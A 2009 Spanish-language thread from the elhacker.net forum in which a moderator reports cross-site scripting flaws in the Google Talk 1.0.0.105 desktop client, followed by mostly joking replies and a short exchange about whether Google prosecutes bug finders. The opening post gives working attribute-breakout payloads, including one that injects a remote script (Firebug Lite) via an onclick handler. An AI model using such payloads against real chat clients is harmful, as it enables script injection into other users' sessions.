elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 03:57  


Tema destacado: Grupo de Facebook de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  XSS en Google Talk 1.0.0.105
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: XSS en Google Talk 1.0.0.105  (Leído 3,256 veces)
WHK
吴阿卡
Moderador
***
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
XSS en Google Talk 1.0.0.105
« en: 18 Octubre 2009, 01:54 »

Bueno, comenzé a probar en una virtual de gtalk a gtalk y me encontré con dos xss.
Por ejemplo cuando uno escribe un enlace http://<h1>test se ejecuta inmediatamente ya que el enío del string dentro de un href no se filtra y eso significa que un xss puede alojarse en el nombre de la url y el otro en la url misma como código html.

Cuando escribimos http://<h1>test en realidad se imprime esto: <a href='http://<h1>test'>http://<h1>test</a> y como se utilizan comillas simples para los tags de html podemos escapar con http://'onclick='alert(/lol/)'x=' y quedará masomenos así:
<a href='http://'onclick='alert(/lol/)'x=''>http://'onclick='alert(/lol/)'x='</a>

xDD y el resultado es algo asi como esto:



Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk cambiandole el fondo por una imagen de doom3, paisajes, coloreando los bordes, letras hasta que a el se le ocurrió inyectar el firebug y saber un poco mas del código fuente ya que en realidad no habia archivo temporal porque utilizaba un iframe de internet explorer 6 con la dirección about:blank haciendo document.write



A los que quiean inyectar el firebug pueden escribir estas dos lineas:
Citar
http://'onclick='document.body.appendChild(document.createElement("script")).src="http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js"'x='
hacerle click y luego
Citar
http://'onclick='alert(firebug.init())'x='
y al hacerle click llamarán a firebug  :P

Está entetenido.
Para los que quieran descompilar el ejecutable del gtalk está cifrado en molebox 2.5.7 .
En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.210


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: XSS en Google Talk 1.0.0.105
« Respuesta #1 en: 18 Octubre 2009, 21:35 »

os aburris mucho,verdad¿¿   ;-) ;-) :P
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Jubjub


Desconectado Desconectado

Mensajes: 708


Lay Ladie lay,...


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #2 en: 18 Octubre 2009, 21:38 »

Grandes ;D
En línea

Jugando con Fósforoshacking con un tono diferente


.
porno
Debci
Wiki

Desconectado Desconectado

Mensajes: 1.945


Actualizate o muere!


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #3 en: 21 Octubre 2009, 15:06 »

que gente... se nota el tiempo libre jaja xDD
Y google no podria hacer nada al respecto? no pueden denunciaros o algo por el estilo??

Saludos
En línea

ohk


Desconectado Desconectado

Mensajes: 1.578


Some times I think i'm crazy, I'm crazy o so crazy


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #4 en: 21 Octubre 2009, 15:58 »

genial ;D
En línea

Y es que a veces pienso, que si no estubiera loco, no podría salir adelante.
jdc


Desconectado Desconectado

Mensajes: 3.253


janito dos cuatro...


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #5 en: 21 Octubre 2009, 17:53 »

Nah.... Google regala poleras xD
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 1.945


Actualizate o muere!


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #6 en: 21 Octubre 2009, 18:20 »

Nah.... Google regala poleras xD
enserio, si haceis este tipo de cosas peuden tomar algun tipo de carga legal contra el atacante/tester?

Saludos
En línea

jdc


Desconectado Desconectado

Mensajes: 3.253


janito dos cuatro...


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #7 en: 21 Octubre 2009, 18:39 »

Conociendo a los descubridores... Google ya debe estar enterado y preparando una actualización xD
En línea

WHK
吴阿卡
Moderador
***
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #8 en: 21 Octubre 2009, 20:49 »

google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98
En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
Debci
Wiki

Desconectado Desconectado

Mensajes: 1.945


Actualizate o muere!


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #9 en: 21 Octubre 2009, 22:05 »

google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98
jaja ok xD

Saludos
En línea

sirdarckcat
Troll Buena Onda y
Moderador
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #10 en: 22 Octubre 2009, 03:39 »

Citar
Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk
para mi era medio dia.. XDDD
En línea

Zero_Bits

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Re: XSS en Google Talk 1.0.0.105
« Respuesta #11 en: 22 Octubre 2009, 03:49 »

Gran descubrimiento..
Que descuido de google xDDD
Saludos..
En línea
Gabeznico

Desconectado Desconectado

Mensajes: 112



Ver Perfil
Re: XSS en Google Talk 1.0.0.105
« Respuesta #12 en: 22 Octubre 2009, 05:50 »

jajaja lo que es el ocio :P

en las salas de chat de www.tagged.com yo hacia lo mismo
jaja hasta que alguien más se dio cuenta, le aviso a Alex y lo remodelaron todo desde 0, ya nada quedo igual  :-[
En línea
дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.089


Mtz De C.


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #13 en: 28 Octubre 2009, 00:17 »

jajaja par de ociosos xDDD

Congrat!
En línea



Con sangre andaluza :)
Skeletron


Desconectado Desconectado

Mensajes: 1.686


A long way to go


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #14 en: 1 Noviembre 2009, 02:35 »

Que grande los chicos!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines